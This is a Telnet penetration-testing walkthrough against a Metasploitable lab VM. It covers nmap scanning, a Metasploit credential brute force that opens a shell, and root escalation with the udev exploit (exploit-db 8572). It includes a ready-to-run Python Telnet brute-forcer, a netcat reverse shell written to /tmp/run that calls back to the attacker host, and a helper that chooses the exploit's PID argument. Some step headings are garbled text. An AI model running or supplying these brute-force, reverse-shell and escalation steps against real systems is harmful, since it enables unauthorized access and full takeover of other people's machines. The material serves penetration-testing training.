Telnet is a member of the TCP/IP protocol suite and the standard protocol for remote login over the Internet. It lets a user do work on a remote host from a local machine: the user runs a telnet client on their own computer, connects to the server, and types commands into the client; the commands run on the server exactly as if they had been typed at its console.
Although Telnet is simple, practical and convenient, it is rarely used in modern, security-conscious networks. The reason is that Telnet is a cleartext protocol: everything the user sends, including the username and password, crosses the network unencrypted, where any on-path observer can read it. Many servers therefore disable the Telnet service altogether. If you do want to use Telnet for remote login, first check on the remote server that the Telnet service is enabled.
By default the Telnet server listens on TCP port 23.
Telnet version detection
Before exploiting anything over Telnet you need to know what you are talking to: the host and the software version. nmap's service detection against port 23 shows below that the target is a Linux machine running the stock Linux telnetd.
? ~ nmap -p23 -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:42 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
Telnet password brute force
Below, Metasploit is used to guess Telnet usernames and passwords against the target.
1. Start msfconsole
? ~ msfconsole
[-] *** Starting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
msf5 >
2旅择、使用search telnet進(jìn)行查詢telnet可以利用的模塊
msf5 > search telnet
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal No D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/cisco/ios_telnet_rocem 2017-03-17 normal No Cisco IOS Telnet Denial of Service
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal No Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
auxiliary/scanner/telnet/brocade_enable_login normal Yes Brocade Enable Login Check Scanner
auxiliary/scanner/telnet/lantronix_telnet_password normal Yes Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version normal Yes Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/satel_cmd_exec 2017-04-07 normal Yes Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
auxiliary/scanner/telnet/telnet_encrypt_overflow normal Yes Telnet Service Encryption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login normal Yes Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom normal Yes RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version normal Yes Telnet Service Banner Detection
auxiliary/server/capture/telnet normal No Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution
exploit/linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection
exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection
exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution
exploit/linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution
exploit/linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable
exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass
exploit/unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution
exploit/unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass
exploit/unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow
payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote normal No Windows Gather mRemote Saved Password Extraction
3惭笑、選擇一個(gè)暴力破解輔助(auxiliary),并設(shè)置好相應(yīng)參數(shù)
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set THREADS 5
THREADS => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/telnet/telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 23 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
4生真、最后進(jìn)行破解沉噩,并連接上session
msf5 auxiliary(scanner/telnet/telnet_login) > run
[!] 10.0.2.5:23 - No active DB -- Credential data will not be saved!
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:root (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: test:test (Incorrect: )
[+] 10.0.2.5:23 - 10.0.2.5:23 - Login Successful: msfadmin:msfadmin
[*] 10.0.2.5:23 - Attempting to start session 10.0.2.5:23 with msfadmin:msfadmin
[*] Command shell session 1 opened (10.0.2.12:34457 -> 10.0.2.5:23) at 2019-07-11 00:46:41 -0400
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:matrix (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: ghost:ghost (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:sleeper (Incorrect: )
^C[*] 10.0.2.5:23 - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell TELNET msfadmin:msfadmin (10.0.2.5:23) 10.0.2.12:34457 -> 10.0.2.5:23 (10.0.2.5)
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -i 1
[*] Starting interaction with 1...
id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$
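The two passages above (the banner grab showing Telnet's cleartext nature, and the telnet_login brute force) hide the protocol details inside nmap and Metasploit. The following is an added example, not code from the original page or from Metasploit, that does the same credential check by hand: it answers the server's option negotiation, recognises the login, password, failure and shell prompts, and parses a USERPASS_FILE-style list. The prompt patterns, the 10-second timeout and the rule that a comment line starts with # are my assumptions; the sample bytes in the comments are constructed.

```python
"""Hand-rolled Telnet credential check: what auxiliary/scanner/telnet/telnet_login
does under the hood, with the RFC 854 protocol handling made explicit."""
import re
import socket

# Telnet command bytes (RFC 854 / RFC 855 option negotiation)
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def negotiate(data):
    """Split one received chunk into (cleartext, reply_bytes).
    Every option the server offers (WILL) or asks for (DO) is refused
    (DONT / WONT); a plain telnetd still proceeds to the login prompt.
    Sub-negotiations (IAC SB ... IAC SE) are skipped, a doubled 0xff is
    a literal byte, and a command cut off at the chunk end is dropped."""
    text, reply, i = bytearray(), bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            text.append(data[i])
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:
            text.append(IAC)
            i += 2
        elif i + 2 < len(data) and data[i + 1] in (DO, DONT, WILL, WONT):
            cmd, opt = data[i + 1], data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        elif i + 1 < len(data) and data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:
            i += 2  # any other two-byte command, or a truncated one
    return bytes(text), bytes(reply)


# Prompt patterns (assumed), checked against cleartext received since our last send
FAIL_RE = re.compile(rb"login incorrect|login failed|access denied|authentication failed", re.I)
PASS_RE = re.compile(rb"password\s*:$", re.I)
LOGIN_RE = re.compile(rb"(login|username|user)\s*:$", re.I)
SHELL_RE = re.compile(rb"[$#%>]$")


def classify(buf):
    """State of the conversation: failed, password, login, shell or wait."""
    tail = buf.rstrip()
    if FAIL_RE.search(buf):
        return "failed"
    if PASS_RE.search(tail):
        return "password"
    if LOGIN_RE.search(tail):
        return "login"
    if SHELL_RE.search(tail):
        return "shell"
    return "wait"


def try_login(host, port, user, password, timeout=10.0):
    """Return True when user:password reaches a shell prompt on host:port."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        buf, sent_user, sent_pass = b"", False, False
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                return False  # no recognisable prompt in time: treat as failure
            if not chunk:
                return False  # server closed the connection
            text, reply = negotiate(chunk)
            if reply:
                s.sendall(reply)
            buf += text
            state = classify(buf)
            if state == "failed" or (state == "login" and sent_pass):
                return False  # explicit failure, or a fresh login prompt after the password
            if state == "login" and not sent_user:
                s.sendall(user.encode() + b"\r\n")
                buf, sent_user = b"", True
            elif state == "password" and sent_user and not sent_pass:
                s.sendall(password.encode() + b"\r\n")
                buf, sent_pass = b"", True
            elif state == "shell" and sent_pass:
                return True


def load_userpass(lines):
    """Parse the USERPASS_FILE format: 'user password' per line, whitespace
    separated. A line with only a user means a blank password; blank lines
    and lines starting with # (an assumption, not Metasploit's rule) are skipped."""
    pairs = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        pairs.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return pairs


def brute(host, port, pairs, stop_on_success=True):
    """Yield (user, password, ok) per pair; optionally stop at the first hit."""
    for user, password in pairs:
        ok = try_login(host, port, user, password)
        yield user, password, ok
        if ok and stop_on_success:
            return


if __name__ == "__main__":  # python3 telnet_login.py 10.0.2.5 userpass.txt
    import sys
    with open(sys.argv[2]) as f:
        creds = load_userpass(f)
    for user, password, ok in brute(sys.argv[1], 23, creds):
        print(("[+] " if ok else "[-] ") + user + ":" + password)
```

Because the script refuses every option, the server never enables ECHO suppression, so the password is echoed back in cleartext just as it crosses the wire in cleartext: a packet capture of either this script or the Metasploit run shows every guessed credential, which is the point made in the introduction. The STOP_ON_SUCCESS behaviour seen in the Metasploit output corresponds to the stop_on_success flag of brute().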
Privilege escalation from the shell
The shell obtained above is only the msfadmin user (uid 1000, not root), so the next step is to escalate. The exploit used is exploit-db entry 8572, a local privilege escalation against the udev daemon (CVE-2009-1185): udevd versions before 141 accepted netlink uevent messages without checking that they came from the kernel, so a local user can send one that makes udevd run a program of their choosing as root.
1. On Kali, download the exploit and serve it over HTTP. (/var/www/html is the web root used by both the Apache and nginx packages on Kali.)
? ~ cd /var/www/html
? ~ wget http://www.exploit-db.com/download/8572
? ~ systemctl start nginx
2畜眨、Kali中啟動NC監(jiān)聽
? ~ nc -lvp 4444
listening on [any] 4444 ...
3昼牛、通過上面拿到的目標(biāo)主機(jī)shell下載exp
msfadmin@metasploitable:~$ wget http://10.0.2.12/8572
wget http://10.0.2.12/8572
--09:18:28-- http://10.0.2.12/8572
=> `8572'
Connecting to 10.0.2.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [application/octet-stream]
100%[====================================>] 2,876 --.--K/s
09:18:28 (561.72 KB/s) - `8572' saved [2876/2876]
4. Everything is in place: escalate
Compile the exploit with gcc, write the script that udevd will run as root, and run the exploit. The exploit hard-codes /tmp/run as the program udevd executes, which is why the reverse-shell script must have exactly that path; the script uses /bin/netcat -e, which needs the traditional netcat (the OpenBSD variant has no -e).
Exploit argument: the PID of udevd's netlink socket. That is normally the udevd PID minus 1 (ps shows udevd as 2302 below, so 2301 is passed); /proc/net/netlink lists the netlink sockets if you want to confirm the number before running it.
msfadmin@metasploitable:~$ mv 8572 8572.c
mv 8572 8572.c
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ gcc 8572.c -o exploit
gcc 8572.c -o exploit
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run
echo '#!/bin/sh' > /tmp/run
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ ps -edf |grep udev
ps -edf |grep udev
root 2302 1 0 08:48 ? 00:00:00 /sbin/udevd --daemon
msfadmin 4847 4844 0 09:44 pts/1 00:00:00 grep udev
msfadmin@metasploitable:~$ chmod +x exploit
chmod +x exploit
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ ./exploit 2301
./exploit 2301
msfadmin@metasploitable:~$
5伶椿、查看Kali中NC監(jiān)聽結(jié)果
? ~ nc -lvp 4444
listening on [any] 4444 ...
10.0.2.5: inverse host lookup failed: Unknown host
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.5] 50536
id
uid=0(root) gid=0(root)
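The two things the walkthrough above takes on faith are that the target's udev is old enough to be vulnerable and that "udevd PID minus 1" is really the socket PID the exploit wants. The following is an added example, not part of the original page or of the 8572 exploit, with the pre-flight checks a practitioner would run first: it parses the output of udevadm --version (or udevd --version on old systems) and the /proc/net/netlink table, both readable by an unprivileged user. The table below is constructed to match the PIDs in the walkthrough; the kernel-side socket showing Pid 0 and the 141 version threshold (the udev release that fixed CVE-2009-1185) are facts, the output strings are my choice.

```python
"""Pre-flight checks for the udev netlink privilege escalation (exploit-db 8572,
CVE-2009-1185): is udev older than 141, and which netlink PID should be passed
to ./exploit? Both answers come from files a low-privileged user can read."""
import re

NETLINK_KOBJECT_UEVENT = 15  # protocol number of the uevent netlink family

# Constructed /proc/net/netlink content matching the walkthrough (udevd PID 2302).
# Column 2 is the protocol (Eth), column 3 the port id (Pid); Pid 0 is the kernel.
SAMPLE_NETLINK = (
    "sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks\n"
    "c7a0e400 0   0      00000000 0        0        00000000 2\n"
    "c7a0e000 15  2301   00000001 0        0        00000000 2\n"
    "c7a0e800 15  0      00000000 0        0        00000000 2\n"
    "c7a0ec00 16  4845   00000000 0        0        00000000 2\n"
)


def udev_is_vulnerable(version_output):
    """True when udevadm --version / udevd --version reports a release below 141,
    the first udev that verifies that a netlink message came from the kernel."""
    m = re.search(r"\b(\d{2,3})\b", version_output)
    return bool(m) and int(m.group(1)) < 141


def uevent_socket_pids(proc_net_netlink):
    """Port ids of user-space sockets bound to the uevent family, taken from
    the text of /proc/net/netlink. The header row and kernel sockets are skipped."""
    pids = []
    for line in proc_net_netlink.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 3:
            continue
        eth, pid = int(fields[1]), int(fields[2])
        if eth == NETLINK_KOBJECT_UEVENT and pid != 0:
            pids.append(pid)
    return pids


def choose_target_pid(proc_net_netlink, udevd_pid):
    """Pick the argument for ./exploit and say why. The socket table is the
    authority; the 'udevd PID minus 1' rule of thumb is only a fallback, and a
    mismatch between the two is reported rather than silently resolved."""
    pids = uevent_socket_pids(proc_net_netlink)
    guess = udevd_pid - 1
    if not pids:
        return guess, "no uevent socket listed; using udevd PID - 1"
    if guess in pids:
        return guess, "confirmed by /proc/net/netlink"
    return pids[0], "differs from udevd PID - 1; trust the socket table"


if __name__ == "__main__":  # on the target: python3 udev_check.py <udevd_pid>
    import sys
    with open("/proc/net/netlink") as f:
        pid, why = choose_target_pid(f.read(), int(sys.argv[1]))
    print("./exploit %d   # %s" % (pid, why))
```

On a target as old as the one in the walkthrough there may be no Python 3, in which case cat /proc/net/netlink and read the Eth 15 row by eye; the functions are pure so they can also be run on the attacker's side against copied output. The reason the rule of thumb usually holds is that udevd binds its netlink socket before it daemonises, so the socket carries the pre-fork PID while ps shows the forked child.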